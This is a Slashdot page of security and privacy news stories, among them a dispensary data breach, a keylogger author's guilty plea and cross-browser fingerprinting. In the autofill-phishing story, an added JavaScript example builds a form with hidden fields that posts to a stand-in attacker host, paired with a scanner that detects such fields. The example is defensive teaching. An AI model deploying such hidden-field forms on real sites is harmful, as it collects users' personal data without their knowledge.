Privacy

Hackers Corrupt Data For Cloud-Based Medical Marijuana System (bostonglobe.com) 112

Long-time Slashdot reader t0qer writes: I'm the IT director at a medical marijuana dispensary. Last week the point-of-sale system we were using was hacked... What scares me about this breach is, I have about 30,000 patients in my database alone. If this company has 1,000 more customers like me, even half of that is still 15 million people on a list of people that "Smoke pot"...
"No patient, consumer, or client data was ever extracted or viewed," the company's data director has said. "The forensic analysis proves that. The data was encrypted -- so it couldn't have been viewed -- and it was never extracted, so nobody has it and could attempt decryption." They're saying it was a "targeted" attack meant to corrupt the data rather than retrieve it, and they're "reconstructing historical data" from backups, though their web site adds that their backup sites were also targeted.

"In response to this attack, all client sites have been migrated to a new, more secure environment," the company's CEO announced on YouTube Saturday, adding that "Keeping our client's data secure has always been our top priority." Last week one industry publication had reported that the outage "has sent 1,000 marijuana retailers in 23 states scrambling to handle everything from sales and inventory management to regulatory compliance issues."
Security

Student Hacker Faces 10 Years in Prison For Spyware That Hit 16,000 Computers (vice.com) 169

An anonymous reader quotes Motherboard: A 21-year-old from Virginia pleaded guilty on Friday to writing and selling custom spyware designed to monitor a victim's keystrokes. Zachary Shames, from Great Falls, Virginia, wrote a keylogger, malware designed to record every keystroke on a computer, and sold it to more than 3,000 people who infected more than 16,000 victims with it, according to a press release from the U.S. Department of Justice.

Shames, who appears to be a student at James Madison University, developed the first version of the spyware while he was still a high school student in 2013, "and continued to modify and market the illegal product from his college dorm room," according to the feds... While the feds only vaguely referred to it as "some malicious keylogger software," it appears the spyware was actually called "Limitless Keylogger Pro," according to evidence found by a security researcher who asked to remain anonymous... According to what appears to be Shames' LinkedIn page, he was an intern for the defense contractor Northrop Grumman from May 2015 until August 2016.

The Department of Justice announced that he'll be sentenced on June 16, and faces a maximum of 10 years in prison.
Privacy

Tor Onion Browser's Creator Explains Free Version For iOS (mike.tig.as) 25

The free iOS version of the Tor browser "sparked a tidal wave of interest" after its release in December, according to Silicon.co. Mickeycaskill writes: The cost has been scrapped due to developer Mike Tigas' worries that the price was limiting access to anonymous browsing for those who need it most. "Given recent events, many believe it's more important than ever to exercise and support freedom of speech, privacy rights, and digital security," Tigas wrote in a blog post. "I think now is as good a time as ever to make Onion Browser more accessible to everyone."
"I'm still a little terrified that I've made this change," Tigas adds. For four years the Tor Onion browser was available on the Apple App Store for $0.99, the lowest non-free price allowed by Apple, providing a "reliable" income to Tigas which helped him move to New York for a new job while allowing him "the economic freedom to continue working on side projects that have a positive impact in the world." Tigas also writes that "there's now a Patreon page and other ways to support the project."

Last month the Tor Project also released the first alpha version of the sandboxed Tor Browser.
Government

Petition With Over 1 Million Signatures Urges President Obama To Pardon Snowden (cnet.com) 260

An anonymous reader quotes a report from CNET: More than 1 million people signed onto a petition asking President Barack Obama to pardon Edward Snowden, proponents of the pardon said Friday. The campaign began in September, when Snowden, his attorney Ben Wizner from the ACLU, and other privacy activists announced they would formally petition Obama for a pardon. Snowden leaked classified NSA documents detailing surveillance programs run by the U.S. and its allies to journalists in 2013, kicking off a heated debate on whether Americans should be willing to sacrifice internet privacy to help the government protect the country from terrorist attacks. Obama and White House representatives have said repeatedly that Snowden must face the charges against him and that he'll be afforded a fair trial. In the U.S., a pardon is "an expression of the president's forgiveness and ordinarily is granted in recognition of the applicant's acceptance of responsibility for the crime and established good conduct for a significant period of time after conviction or completion of sentence," according to the Office of the Pardon Attorney. It does not signify innocence. Also on Friday, David Kaye urged Obama to consider a pardon for Snowden. Kaye, the special rapporteur to the United Nations Human Rights Council on the freedom of expression, said U.S. law doesn't allow Snowden to argue that his disclosures were made for the benefit of the public. The jury would merely be asked to decide whether Snowden stole government secrets and distributed them -- something Snowden himself concedes he did. In response to the petition, Edward Snowden tweeted: "Whether or not this President ends the war on whistleblowers, you've sent a message to history: I feared no one would care. I was wrong."
Republicans

Trump's Cyber Security Advisor Rudy Giuliani Runs Ancient, Utterly Hackable Website (theregister.co.uk) 270

mask.of.sanity writes from a report via The Register: U.S. president-elect Donald Trump's freshly minted cyber tsar Rudy Giuliani runs a website so insecure that its content management system is five years out of date, unpatched and is utterly hackable. Giulianisecurity.com, the website for Giuliani's eponymous infosec consultancy firm, runs Joomla! version 3.0, released in 2012, and since found to carry 15 separate vulnerabilities. More bugs and poor security controls abound. The Register report adds: "Some of those bugs can be potentially exploited by miscreants using basic SQL injection techniques to compromise the server. This seemingly insecure system also has a surprising number of network ports open -- from MySQL and anonymous LDAP to a very out-of-date OpenSSH 4.7 that was released in 2007. It also runs a rather old version of FreeBSD. 'You can probably break into Giuliani's server,' said Robert Graham of Errata Security. 'I know this because other FreeBSD servers in the same data center have already been broken into, tagged by hackers, or are now serving viruses. But that doesn't matter. There's nothing on Giuliani's server worth hacking.'"
Security

Security Experts Rebut The Guardian's Report That Claimed WhatsApp Has a Backdoor (gizmodo.com) 110

William Turton, writing for Gizmodo: This morning, the Guardian published a story with an alarming headline: "WhatsApp backdoor allows snooping on encrypted messages." If true, this would have massive implications for the security and privacy of WhatsApp's one-billion-plus users. Fortunately, there's no backdoor in WhatsApp, and according to Alec Muffett, an experienced security researcher who spoke to Gizmodo, the Guardian's story is a "major league fuckwittage." [...] Fredric Jacobs, who was the iOS developer at Open Whisper Systems, the collective that designed and maintains the Signal encryption protocol, and who most recently worked at Apple, said, "Nothing new. Of course, if you don't verify keys Signal/WhatsApp/... can man-in-the-middle your communications." "I characterize the threat posed by such reportage as being fear and uncertainty and doubt on an 'anti-vaccination' scale," Muffett, who previously worked on Facebook's engineering security infrastructure team, told Gizmodo. "It is not a bug, it is working as designed and someone is saying it's a 'flaw' and pretending it is earth shattering when in fact it is ignorable." The supposed "backdoor" the Guardian is describing is actually a feature working as intended, and it would require significant collaboration with Facebook to be able to snoop on and intercept someone's encrypted messages, something the company is extremely unlikely to do. "There's a feature in WhatsApp that -- when you swap phones, get a new phone, factory reset, whatever -- when you install WhatsApp freshly on the new phone and continue a conversation, the encryption keys get re-negotiated to accommodate the new phone," Muffett told Gizmodo. Other security experts and journalists have also criticized The Guardian's story.
Privacy

Switzerland Agrees To Its Own New Data Sharing Pact With the US (silicon.co.uk) 15

Mickeycaskill quotes a report from Silicon.co.uk: Switzerland has agreed its own new data transfer agreement with the United States, basing the framework on the deal struck by the European Union (EU) following the invalidation of Safe Harbour. The previous arrangement was invalidated because of concerns about U.S. mass surveillance but Switzerland says the new Swiss-U.S. Privacy Shield will allow Swiss companies to transfer customer data without the need for additional contractual guarantees. The Swiss Federal Council, a seven-member executive council that is effectively the head of government in Switzerland, claims citizens will benefit from additional protections and the ability to contact an ombudsman about data issues. Although not part of the EU, Switzerland is a member of the European Economic Area (EEA) and has several bilateral agreements with the EU that see it adopt many of the bigger bloc's policies. The Federal Council says the alignment between the EU and the Swiss transatlantic data sharing partnerships is good news for multinational organizations.
Privacy

Fingerprinting Methods Identify Users Across Different Browsers On the Same PC (bleepingcomputer.com) 88

An anonymous reader quotes a report from BleepingComputer: A team of researchers from universities across the U.S. has identified different fingerprinting techniques that can track users when they use different browsers installed on the same machine. Named "cross-browser fingerprinting" (CBF), this practice relies on new technologies added to web browsers in recent years, some of which had been previously considered unreliable for cross-browser tracking and only used for single browser fingerprinting. These new techniques rely on making browsers carry out operations that use the underlying hardware components to process the desired data. For example, making a browser apply an image to the side of a 3D cube in WebGL provides a similar response in hardware parameters for all browsers. This is because the GPU card is the one carrying out this operation and not the browser software. According to the three-man research team led by Assistant Professor Yinzhi Cao from the Computer Science and Engineering Department at Lehigh University, the following browser features could be (ab)used for cross-browser fingerprinting operations: [Screen Resolution, Number of CPU Virtual Cores, AudioContext, List of Fonts, Line, Curve, and Anti-Aliasing, Vertex Shader, Fragment Shader, Transparency via Alpha Channel, Installed Writing Scripts (Languages), Modeling and Multiple Models, Lighting and Shadow Mapping, Camera and Clipping Planes.] Researchers used all these techniques together to test how many users they would be able to pin to the same computer. For tests, researchers used browsers such as Chrome, Firefox, Edge, IE, Opera, Safari, Maxthon, UC Browser, and Coconut. Results showed that CBF techniques were able to correctly identify 99.24% of all test users. Previous research methods achieved only a 90.84% result.
Government

Obama Changed Rules Regarding Raw Intelligence, Allowing NSA To Share Raw Data With US's Other 16 Intelligence Agencies (schneier.com) 197

An anonymous reader quotes a report from Schneier on Security: President Obama has changed the rules regarding raw intelligence, allowing the NSA to share raw data with the U.S.'s other 16 intelligence agencies. The new rules significantly relax longstanding limits on what the N.S.A. may do with the information gathered by its most powerful surveillance operations, which are largely unregulated by American wiretapping laws. These include collecting satellite transmissions, phone calls and emails that cross network switches abroad, and messages between people abroad that cross domestic network switches. The change means that far more officials will be searching through raw data. Essentially, the government is reducing the risk that the N.S.A. will fail to recognize that a piece of information would be valuable to another agency, but increasing the risk that officials will see private information about innocent people. Here are the new procedures. This rule change has been in the works for a while. Here are two blog posts from April discussing the then-proposed changes.
Privacy

Japan Researchers Warn of Fingerprint Theft From 'Peace' Sign (phys.org) 119

Tulsa_Time quotes a report from Phys.Org: Could flashing the "peace" sign in photos lead to fingerprint data being stolen? Research by a team at Japan's National Institute of Informatics (NII) says so, raising alarm bells over the popular two-fingered pose. Fingerprint recognition technology is becoming widely available to verify identities, such as when logging on to smartphones, tablets and laptop computers. But the proliferation of mobile devices with high-quality cameras and social media sites where photographs can be easily posted is raising the risk of personal information being leaked, reports said. The NII researchers were able to copy fingerprints based on photos taken by a digital camera three meters (nine feet) away from the subject.
Chrome

Latest Adobe Acrobat Reader Update Silently Installs Chrome Extension (bleepingcomputer.com) 144

An anonymous reader writes: The latest Adobe Acrobat Reader security update (15.023.20053), besides delivering security updates, also secretly installs the Adobe Acrobat extension in the user's Chrome browser. There is no mention of this "special package" on Acrobat's changelog, and surprise-surprise, the extension comes with anonymous data collection turned on by default. Bleeping Computer reports: "This extension allows users to save any web page they're on as a PDF file and share it or download it to disk. The extension is also Windows-only, meaning Mac and Linux Chrome users will not receive it. The extension requests the following permissions: Read and change all your data on the websites you visit; Manage your downloads; Communicate with cooperating native applications. According to Adobe, extension users 'share information with Adobe about how [they] use the application. The information is anonymous and will help us improve product quality and features,' Adobe also says. 'Since no personally identifiable information is collected, the anonymous data will not be meaningful to anyone outside of Adobe.'"
Medicine

Microsoft Anti-Porn Workers Sue Over PTSD (thedailybeast.com) 297

An anonymous reader shares with us a report from The Daily Beast: When former Microsoft employees complained of the horrific pornography and murder films they had to watch for their jobs, the software giant told them to just take more smoke breaks, a new lawsuit alleges. Members of Microsoft's Online Safety Team had "God-like" status, former employees Henry Soto and Greg Blauert allege in a lawsuit filed on Dec. 30. They "could literally view any customer's communications at any time." Specifically, they were asked to screen Microsoft users' communications for child pornography and evidence of other crimes. But Big Brother didn't offer a good health care plan, the Microsoft employees allege. After years of being made to watch the "most twisted" videos on the internet, employees said they suffered severe psychological distress, while the company allegedly refused to provide a specially trained therapist or to pay for therapy. The two former employees and their families are suing for damages from what they describe as permanent psychological injuries, for which they were denied worker's compensation. "Microsoft applies industry-leading, cutting-edge technology to help detect and classify illegal images of child abuse and exploitation that are shared by users on Microsoft Services," a Microsoft spokesperson wrote in an email. "Once verified by a specially trained employee, the company removes the image, reports it to the National Center for Missing and Exploited Children, and bans the users who shared the images from our services. We have put in place robust wellness programs to ensure the employees who handle this material have the resources and support they need." But the former employees allege neglect at Microsoft's hands.
Security

Windows 10 Will Soon Lock Your PC When You Step Away From It (theverge.com) 172

An anonymous reader quotes a report from The Verge: Microsoft is working on a new Windows 10 feature that will automatically lock and secure a PC when the operating system detects someone has moved away from the machine. The feature is labelled as Dynamic Lock in recent test builds of Windows 10, and Windows Central reports that Microsoft refers to this as "Windows Goodbye" internally. Microsoft currently uses special Windows Hello cameras to let Windows 10 users log into a PC with just their face. Big corporations teach employees to use the winkey+L combination to lock machines when they're idle, but this new feature will make it an automatic process. It's not clear exactly how Microsoft will detect inactivity, but it's possible the company could use Windows Hello-compatible machines or detect idle activity and lock the machine accordingly. Windows can already be configured to do this after a set time period, but it appears Microsoft is streamlining this feature into a simple setting for anyone to enable. Microsoft is planning to deliver Dynamic Lock as part of the Windows 10 Creators Update, expected to arrive in April.
Microsoft

Microsoft To Enhance User Privacy Controls In Upcoming Windows 10 Update (hothardware.com) 183

MojoKid writes: When Microsoft first launched Windows 10, it was generally well-received but also came saddled with a number of privacy concerns. It has taken quite a while for Microsoft to respond to these concerns in a meaningful way, but the company is finally proving that it's taking things seriously by detailing some enhanced privacy features coming to a future Windows 10 build. Microsoft is launching what it calls a (web-based) privacy dashboard, which lets you configure anything and everything about information that might be sent back to the mothership. You can turn all tracking off, or pick and choose, if certain criteria don't concern you too much, like location or health activity, for example. Also, for fresh installs, you'll be given more specific privacy options so that you can feel confident from the get-go about the information you're sending Redmond's way. If you do decide to send any information Microsoft's way, the company promises that it won't use your information for the sake of targeted advertising.
Privacy

WhatsApp, Gmail Roped Into Tougher EU Privacy Proposal (reuters.com) 36

Online messaging and email services such as WhatsApp, iMessage and Gmail will face tough new rules on how they can track users under a proposal presented by the European Union executive on Tuesday. From a report: The web players will have to guarantee the confidentiality of their customers' conversations and ask for their consent before tracking them online to serve them personalized ads. The proposal by the European Commission extends some rules that now only apply to telecom operators to web companies offering calls and messages using the internet, known as "Over-The-Top" (OTT) services, seeking to close a perceived regulatory gap between the telecoms industry and mainly U.S. Internet giants such as Facebook, Google and Microsoft.
Microsoft

Ask Slashdot: What Is the Best Way To Thank Users For Reporting Security Issues? 128

An anonymous Slashdot reader writes: I have worked in the IT field long enough to know that many issues can be avoided if users pay attention to pop-ups, security alerts, "from" addresses et al and not just machine gun click their way through things. Unfortunately, most users seem to have the "fuck it" mentality in terms of good security practices. Sometimes I will have users submit a ticket asking if an email is safe to open or if that strange 800 number that popped up in their browser is really Microsoft. When that happens I like to talk to them in person (when possible) to commend them and tell them how much trouble could be avoided if more users followed their example. I'm curious to know if anyone has ever worked somewhere with bug bounty type incentives for corporate users or if you have a unique way of thanking people for not trying to open Urgent_Invoice.exe.
Privacy

Lawyer Rewrites Instagram's Privacy Policy So Kids and Parents Can Have a Meaningful Talk About Privacy (qz.com) 95

Kids aged 12 to 15 are increasingly joining Facebook's Instagram service, but according to research, they likely don't even understand what they are signing up for. Jenny Afia, a privacy law expert at Schillings, a UK-based law firm, rewrote Instagram's terms of service in child-friendly language, so that not only the kids but their parents are able to understand what things are at stake. Highlighted are the changes the lawyer has made: Officially you own any original pictures and videos you post, but we are allowed to use them, and we can let others use them as well, anywhere around the world. Other people might pay us to use them and we will not pay you for that. [...] We may keep, use and share your personal information with companies connected with Instagram. This information includes your name, email address, school, where you live, pictures, phone number, your likes and dislikes, where you go, who your friends are, how often you use Instagram, and any other personal information we find such as your birthday or who you are chatting with, including in private messages (DMs). [...] We might send you adverts connected to your interests which we are monitoring. You cannot stop us doing this and it will not always be obvious that it is an advert.
Movies

IMDb Ignores New Law Banning It From Publishing Actors' Ages Online, Cites Free Speech Violations (betanews.com) 217

Back in September, the state of California passed a new law that banned sites that offer paid subscriptions, and allow people to post resumes, from publishing individuals' ages. It's a law that has the potential to affect many sites, but it is the Internet Movie Database (IMDb) that hit the headlines. From a report: IMDb was told to remove actors' ages from the site by 1 January, 2017, but the site has failed to take any action. A full week into 2017, IMDb has not only chosen to ignore the new law, but has also filed a lawsuit in a bid to stop California from implementing Assembly Bill No. 1687. The reason? IMDb believes that the law is a violation of the First Amendment and it says the state has "chosen instead to chill free speech and to undermine access to factual information of public interest" rather than trying to tackle age-discrimination in a more meaningful way.
Mozilla

Browser Autofill Profiles Can Be Abused For Phishing Attacks (bleepingcomputer.com) 112

An anonymous reader quotes Bleeping Computer: Browser autofill profiles are a reliable phishing vector that allow attackers to collect information from users via hidden form fields, which the browser automatically fills with preset personal information and which the user unknowingly sends to the attacker when he submits a form... Finnish web developer Viljami Kuosmanen has published a demo on GitHub... A user looking at this page will only see a Name and Email input field, along with a Submit button. Unless the user looks at the page's source code, he won't know that the form also contains six more fields named Phone, Organization, Address, Postal Code, City, and Country. If the user has an autofill profile set up in his browser, if he decides to autofill the two visible fields, the six hidden fields will be filled in as well, since they're part of the same form, even if invisible to the user's eye.

Browsers that support autofill profiles are Google Chrome, Safari, and Opera. Browsers like Edge, Vivaldi, and Firefox don't support this feature, but Mozilla is currently working on a similar feature.
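The trick rests on one property of autofill: the browser fills every field in the form that it can match to the profile, whether or not the user can see it. Below is an added example written for this page, not Kuosmanen's demo or any browser's code. `PHISH_FORM` is constructed markup in the shape the story describes (two visible fields plus six hidden ones), and `findCovertAutofill` is a scanner that lists the fields a browser could fill from a saved profile but the user would never see. The hiding techniques in `HIDERS`, the name heuristics in `autofillable` and the attacker URL are assumptions of the example.

```javascript
'use strict';
// Added example for this page, not code from Kuosmanen's demo: a constructed
// form in the shape the story describes and a scanner that flags the fields a
// user would never see but a browser would fill. The hiding tricks in HIDERS
// and the autofill heuristics are assumptions of this example.

// Constructed phishing form: two visible fields, six hidden by different
// inline-style tricks, all in one <form> so a single autofill fills every one.
const PHISH_FORM = `
<form action="https://attacker.example/collect" method="post">
  <input name="name"    autocomplete="name"  placeholder="Name">
  <input name="email"   autocomplete="email" placeholder="Email">
  <input name="phone"   autocomplete="tel"            style="display:none">
  <input name="org"     autocomplete="organization"   style="visibility:hidden">
  <input name="address" autocomplete="street-address" style="opacity:0">
  <input name="postal"  autocomplete="postal-code"    style="position:absolute;left:-9999px">
  <input name="city"    autocomplete="address-level2" style="width:0;height:0;overflow:hidden">
  <input name="country" autocomplete="country"        style="clip:rect(0 0 0 0);position:absolute">
  <button type="submit">Submit</button>
</form>`;

// The same two visible fields and nothing else: what the user believes they submit.
const HONEST_FORM = `
<form action="/signup" method="post">
  <input name="name"  autocomplete="name">
  <input name="email" autocomplete="email">
</form>`;

// Pull each <input ...> tag's attributes into a plain object with lower-cased keys.
function parseInputs(html) {
  const inputs = [];
  const tagRe = /<input\b([^>]*)>/gi;
  const attrRe = /([a-zA-Z-]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let t;
  while ((t = tagRe.exec(html)) !== null) {
    const attrs = {};
    let a;
    while ((a = attrRe.exec(t[1])) !== null) attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4] ?? '';
    inputs.push(attrs);
  }
  return inputs;
}

// Inline-style tricks that keep a field out of sight while leaving it in the form.
const HIDERS = [
  [/display\s*:\s*none/i, 'display:none'],
  [/visibility\s*:\s*hidden/i, 'visibility:hidden'],
  [/opacity\s*:\s*0(?![.\d])/i, 'opacity:0'],
  [/(?:left|top)\s*:\s*-\d{3,}px/i, 'moved off-screen'],
  [/(?:width|height)\s*:\s*0(?:px)?\s*(?:;|$)/i, 'zero size'],
  [/clip\s*:\s*rect\(\s*0/i, 'clipped to nothing'],
];

// Returns the trick that hides the field, or null if it is visible. The hidden
// attribute and type=hidden are reported too, although browsers generally
// leave those out of autofill; the CSS tricks are the ones that matter.
function howHidden(attrs) {
  if ('hidden' in attrs || (attrs.type || '').toLowerCase() === 'hidden') return 'hidden attribute';
  for (const [re, label] of HIDERS) if (re.test(attrs.style || '')) return label;
  return null;
}

// A field the browser may fill from a saved profile: an autocomplete token
// other than "off", or a name browsers heuristically match to profile data.
function autofillable(attrs) {
  const ac = (attrs.autocomplete || '').toLowerCase();
  if (ac && ac !== 'off') return true;
  return /name|email|phone|tel|address|zip|postal|city|country|org/i.test(attrs.name || '');
}

// The phishing payload: fields that would be filled without the user seeing them.
function findCovertAutofill(html) {
  return parseInputs(html)
    .filter(a => autofillable(a))
    .map(a => ({ name: a.name || '', token: a.autocomplete || '', hiddenBy: howHidden(a) }))
    .filter(f => f.hiddenBy !== null);
}

console.log(findCovertAutofill(PHISH_FORM));
```

Run against `PHISH_FORM` the scanner lists phone, organization, address, postal code, city and country, each with the trick that hides it; against `HONEST_FORM` it lists nothing. A version run inside the browser (over `document.forms`, using `getComputedStyle` and `getBoundingClientRect`) would also catch fields hidden by a stylesheet rule or by an invisible ancestor, which a scan of the markup alone cannot see. On the user side, the practical defence is to read what the autofill prompt says it will fill, or to keep profile autofill off for sites that have no reason to know more than a name and an address.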

Operating Systems

Richard Stallman Acknowledges Libreboot Is No Longer A Part of GNU (gnu.org) 393

Libreboot became an official GNU project in May. Now an anonymous Slashdot reader writes: Richard Stallman has officially announced that Libreboot is no longer a GNU package. The maintainer of Libreboot had tried to leave the GNU project in September 2016, but the departure was not acknowledged until January 2017. Libreboot is a replacement for proprietary BIOS systems, effectively a distribution of coreboot without any binary blobs and adding an automated build/install process.
In the post titled "Goodbye to GNU Libreboot," Stallman wrote that "When a package's maintainer steps down, that doesn't by itself break the relationship between GNU and the package. If it is left without a maintainer but is still useful, the GNU Project will usually look for new maintainers to work on it. However, we can instead drop ties with the package, if that seems the right thing to do.

"A few months ago, the maintainer of GNU Libreboot decided not to work on Libreboot for the GNU Project any more. That was her decision to make. She also asserted that Libreboot was no longer a GNU package -- something she could not unilaterally do. The GNU Project had to decide what to do in regard to Libreboot. We have decided to go along with the former GNU maintainer's wishes in this case, for a combination of reasons: (1) it had not been a GNU package for very long, (2) she was the developer who had originally made it a GNU package, and (3) there were no major developers who wanted to continue developing Libreboot under GNU auspices."
